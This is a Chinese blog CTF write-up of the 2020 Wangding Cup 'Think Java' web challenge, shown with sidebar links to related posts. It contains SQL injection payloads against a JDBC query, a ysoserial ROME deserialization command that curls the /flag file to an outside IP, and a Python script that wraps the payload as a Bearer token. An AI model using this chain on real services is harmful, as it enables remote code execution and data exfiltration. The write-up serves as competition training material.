第二届网鼎杯(第三场:朱雀组)Think Java

最新推荐文章于 2024-10-01 09:03:06 发布
最新推荐文章于 2024-10-01 09:03:06 发布
阅读量1.8k 收藏 1
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/106225875
版权
首先题目给了一些class文件,这些不需要多说,直接jd-gui反编译或者使用fernflower反编译也可以

解题过程

  • 先扫一下目录
    得到swagger-ui.html
    发现几个api接口

  • sql注入得到密码
    在这里插入图片描述源代码中明显存在SQL注入(dbName可控),但是必须满足两个条件,否则不能连接数据库

    • #号在引号里面时当做填充符,没有实际意义(这个只是在jdbc中这样?还没来得及验证)
    • 最终:
      • jdbc:mysql://mysqldbserver:3306/myapp#‘ union select 1#
      • Select TABLE_COMMENT from INFORMATION_SCHEMA.TABLES Where table_schema =‘myapp#‘ union select 1# and table_name = ‘xxx’
        在这里插入图片描述在这里插入图片描述这儿的#号对查询没有影响~
    • 查询密码
      在这里插入图片描述

  • 登录获得token
    在这里插入图片描述这个一看就知道是java的序列化后的base64编码(如果以aced则为java序列化后的hex编码)

    然后我们把返回的data值输入到/common/user/current 接口中,则显示操作成功
    在这里插入图片描述所以我们知道会在这个接口中进行java的反序列化

  • getflag
    我们直接用ysoserial来生成反序列化的值
    在这里插入图片描述java -jar ysoserial-0.0.5.jar ROME "curl http://174.1.101.83:555 -d @/flag" > HyyMbb.bin

然后进行编码

import base64
file = open("HyyMbb.bin","rb")
now = file.read()
ba = base64.b64encode(now)
#print(ba)
print("Bearer "+ba.decode('utf-8'))
#可以解注释此段,并注释上一条print,便于快速测试
file.close()

发送数据,在vps上监听555端口就可以获得flag了~~

参考链接
HyyMbb
关注
专栏目录
【CTF】java反序列-2020-网鼎杯-朱雀-Web-think_java
(∪.∪ )...zzz的博客
06-13 3678
看目录!读代码如何寻找突破口?存在sql注入抓包 注入语句写在数据包里swagger开发接口login输入用户名密码得到返回数据包user current 读代码 如何寻找突破口? 存在sql注入 抓包 注入语句写在数据包里 (这个包抓错了,所以没有显示密码) /common/test/sqlDict dbName=myapp?a=’ union select (select pwd from user)# “tableDescribe”:“ctfhub_8978
《thinkjava
04-08
《Think Java》作者:Allen B. Downey and Chris Mayeld。 Java学习资料,适合入门。是英文版的。
CTF网鼎杯2020朱雀 thinkjava思路记录
c0529的博客
05-23 1356
1.代码分析 BUUCTF在线评测 (buuoj.cn)打开ctf赛题之后,下载class文件,这个部分是不完整点的源码 在sqldict中存在一个sql注入点,没有采用java的预编译,调用了这个的是在test中,同时,这个采用了swagger接口,这是一个测试页面的接口,我们直接尝试打开这个页面 打开 网址/swagger-ui.html 2.测试点1 这里可以看见有三个可以测试的位置,参考源码中的文件地址,可以发现sql注入点存在在test这个测试中,我们dbName注入sql注
网鼎杯2020半决赛awdplus赛题精讲与技术要点
最新发布
weixin_32921023的博客
10-01 1763
本文还有配套的精品资源,点击获取 简介:网鼎杯2020半决赛awdplus题目是一个网络安全竞赛,主要针对Pwn和Web两大类别。Pwn类别要求参赛者具备程序安全、逆向工程等技能,能够分析和利用底层程序中的漏洞。Web类别则要求参赛者熟悉Web应用安全、服务器端脚本和常见的Web攻击方法。此外,解压密码的提取和备用题目的处理也是比赛的一部分。本专题将深入探讨这些领域的关键知...
网鼎杯 2020 朱雀】Think Java
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
04-08 4871
网鼎杯 2020 朱雀】Think Java 首先下载题目附件,是一些.class文件,反编译查看。 注意到引入的其中一个包: import io.swagger.annotations.ApiOperation; Swagger Swagger 是一个规范和完整的框架,用于生成、描述、调用和可视化 RESTful 风格的 Web 服务。总体目标是使客户端和文件系统作为服务器以同样的速度来更新。文件的方法,参数和模型紧密集成到服务器端的代码,允许API来始终保持同步。 Swagger UI 提供了
网鼎杯2020朱雀-web(Think Java)
weixin_43610673的博客
05-19 2593
下载class.zip解压后用jd-gui查看源码,我是用jd-gui弄出来然后sublime看的 在/common/test/sqlDict有个注入 主要是SqlDict.class 下面注入即可dbName=myapp?useUnicode=true’union/**/select/**/1 这里用post或者get提交都行 dbName=myapp?useUnicode=true'union/**/select/**/group_concat(SCHEMA_NAME)from(informati
Thinking in Java 8
morningbird的专栏
07-25 1356
第7章 多形性“对于面向对象的程序设计语言,多型性是第三种最基本的特征(前两种是数据抽象和继承。”“多形性”(Polymorphism)从另一个角度将接口从具体的实施细节中分离出来,亦即实现了“是什么”与“怎样做”两个模块的分离。利用多形性的概念,代码的织以及可读性均能获得改善。此外,还能创建“易于扩展”的程序。无论在项目的创建过程中,还是在需要加入新特性的时候,它们都可以方便地“成长”。通过合
Think Java 4 学习笔记
yufuer的专栏
06-02 107
ti记: 最近在看Think Java 4(中文),顺便把学习笔记记下来供以后参看。其中包含之前理解不到位的、含糊的、不清楚的简要说明。 第1章 对象导论 ··· ···     第2章 一切都是对象 2.1引用操作对象 一切都看做对象,但操作的标示符实际上是对象的一个引用。 2.2必须由你创建所有对象 5个储存的位置,基本类型特例(适配器模式); java中的数与...
2022年第三届“网鼎杯”网络安全大赛(朱雀)部分题目附件
09-11
2022年第三届“网鼎杯”网络安全大赛(朱雀)部分题目附件
2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络...
2020网鼎杯朱雀题目.rar
05-20
含有misc,re,crypto,pwn,web。web题为thinkjava
Think Java.zip
07-23
java编程思想pdf版本 这也是我自己一直看的一个版本很清晰 可以电脑 手机看 也可以在Kindle 看
2022网鼎杯初赛朱雀赛题
10-18
2022网鼎杯初赛朱雀赛题
网鼎2020-朱雀.rar
05-24
【网鼎2020-朱雀】是2020年网鼎杯网络安全竞赛中朱雀的相关挑战资料,这个压缩包可能包含了该竞赛的Web类题目。网鼎杯是中国知名的网络安全技术大赛,旨在提升参赛者的网络安全技能,促进网络安全行业的健康发展...
[网鼎杯 2020 朱雀]Think Java
Sk1y的博客
04-07 2422
[网鼎杯 2020 朱雀]Think Java 文章目录[网鼎杯 2020 朱雀]Think Java获取源文件SwaggerJDBC sql注入关于#的使用查看数据库名字获取表名获取字段名获取字段值对序列化字符串分析java Deserialization Scanner插件使用ysoserialcurl将flag带出来反弹shell参考文章 获取源文件 下载jar包,扔进jd-gui查看源码 主要是4个文件 Test.java 接收dbName参数,然后调用getTableData方法 packa
CTFHUB-think_java(2020-网鼎杯-朱雀-Web-think_java)
qq_51953382的博客
07-20 499
将编码后的内容填充到命令上,再通过ysoserial获得bin文件,拿到文件之后,我们还需要对其进行base64加密,这里使用的一个Python脚本。但是这是网鼎杯原题的payload,那个题目中flag名称就是flag,是不变的所以可以这么用,通过-d @来提取flag文件内容然后发到自己服务器。获得payload之后,先在咱们的服务器上监听端口之后,在另一个接口处输入payload,来进行反弹shell,注意开头的Bearer保留。进入之后,将我们的得到的信息输入登录实例,来进行调用。
CTFHub靶场 --题目:think_java
weixin_52221158的博客
08-18 581
推测与sql注入有关,打开sqldict.class,发现连接数据库的代码 以及数据库查询语句。让你看的是那个返回包里面的ctfhub账户名,说明这个账户名是被反序列化过后得到值。返回data,以rO0AB开头,java序列化,在身份认证处提交。相当于把服务器的token数据先base64解密,再反序列化。生成bin文件,在进行base64加密,文件更改名字即可。此处为请求地址,加入请求,并结合代码加入注入代码。开始入手,burp抓包,发至repeater。在该接口测试登录,try it out。...
Think in Java(一)
如雨随行的博客
07-05 1566
把对象想象为“服务提供者” 通常被隐藏的部分是对象内部脆弱的部分 合和聚合 合:使用现有的类合成新的 聚合:当合是动态发生的时候,被称为聚合 合经常被视为(has-a)关系,例如汽车拥有引擎。 在建立新类时,应该先考虑合,因为它更加简单灵活。 单根继承结构的优点: 1)所有对象都可以很容易地在堆上创建,而参数传递也得到了极大的简化。 2) 单根继承结构使垃圾回收器的实...
[网鼎杯 2020 朱雀]nmap
03-16
nmap是一款网络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估网络安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理网络,例如发现新设备、检查网络...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值